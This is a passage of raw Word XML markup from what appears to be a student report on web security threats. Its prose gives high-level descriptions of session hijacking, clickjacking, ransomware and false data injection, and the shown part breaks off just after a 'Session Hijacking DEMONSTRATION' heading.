        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832C309" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="345" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     Session hijacking can have several dangerous consequences. The most dangerous consequence of session hijacking is that the malicious attacker can gain entry to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">server and access its data without first hacking a valid account. Aside from all of this, an attacker will be able to engage in a variety of activities, such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E70FDD3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC63B0E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stealing personal information:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session hijacking allows attackers to access confidential information such as passwords, credit card numbers, Aadhar numbers, etc. With such information, an attacker can efficiently execute an identity theft attack or financial fraud. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D452CB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="39" w:line="241" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Infecting a system with malware:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using a stolen session ID, an attacker can infect the user’s computer with malware. As a result, they gain control of the target’s computer and steal their data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678ECE4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Executing the Denial-of-Service (DoS) attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A hacker who gains control of a user’s session may launch a DoS attack against the website to which they are connected. As a result, the service may be disrupted, or the site may even crash. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824DB0B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F40458" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clickjacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24578B86" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CAAB9DD" wp14:editId="3CA94361">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42516" name="Group 4251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40" name="Shape 496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41" name="Shape 496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42" name="Shape 496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43" name="Shape 496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44" name="Shape 496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16" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49645" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49646" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49647" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49648" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4964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7936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="448AAFE3" wp14:editId="178A7487">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42517" name="Group 4251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50" name="Shape 496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1" name="Shape 496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52" name="Shape 496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3" name="Shape 496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654" name="Shape 496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17" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49655" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49656" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49657" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49658" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4965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sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D904834" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="370" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The user thinks they are filling out a regular form, but they are actually filling out fields that the hacker has added on top of the user interface. Hackers will go for credit card numbers, passwords, and any other important information they can access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332ED965" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756BDC0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ransomware Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA4238" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B4586" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ransomware attack is very dangerous as it can halt the operations of an entire company. Hackers attack the database on the server, then ask for ransom to decrypt the data. As it affects the overall business, the company becomes inclined to pay huge ransom to get their company running again. This is very serious and a company has to plan to avoid such problems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF6DDBB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4FD51" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396D09C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">False Data Injection Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCDD5C0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E01DE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False data injection attacks are done from the client side. This can cause interruptions in the business as there is redundant and false data in the database. This can lead to implications in the machine learning model, when the dataset is run using models the results produced are gibberish.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA5055" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64188693" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:sectPr w:rsidR="00F97B52">
          <w:headerReference w:type="even" r:id="rId37"/>
          <w:headerReference w:type="default" r:id="rId38"/>
          <w:footerReference w:type="even" r:id="rId39"/>
          <w:footerReference w:type="default" r:id="rId40"/>
          <w:headerReference w:type="first" r:id="rId41"/>
          <w:footerReference w:type="first" r:id="rId42"/>
          <w:pgSz w:w="11911" w:h="16841"/>
          <w:pgMar w:top="474" w:right="1319" w:bottom="479" w:left="1340" w:header="480" w:footer="478" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEFA100" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc48950"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">RESULTS AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DISCUSSION :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5300508B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1ED2A4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc48951"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WORKING :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="0F83B7DF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3194C4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-15" w:right="4398" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A52973" wp14:editId="1C33E26B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42310" name="Group 4231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60" name="Shape 496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61" name="Shape 496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62" name="Shape 496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63" name="Shape 496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64" name="Shape 496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310" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49665" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49666" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49667" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49668" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4966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0D81DAD9" wp14:editId="49B55E3E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42311" name="Group 4231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70" name="Shape 496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71" name="Shape 496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72" name="Shape 496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73" name="Shape 496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74" name="Shape 496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311" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49675" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49676" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49677" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49678" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 496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Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Session Hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DEMONSTRATION :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48250A3B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DED5F31" wp14:editId="2669BF82">
                <wp:extent cx="5986577" cy="3743427"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="42308" name="Group 42308"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3743427"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3743427"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2459" name="Rectangle 2459"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="37EC8EAB"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460" name="Rectangle 2460"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="713070" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2E87D878"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1 :</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
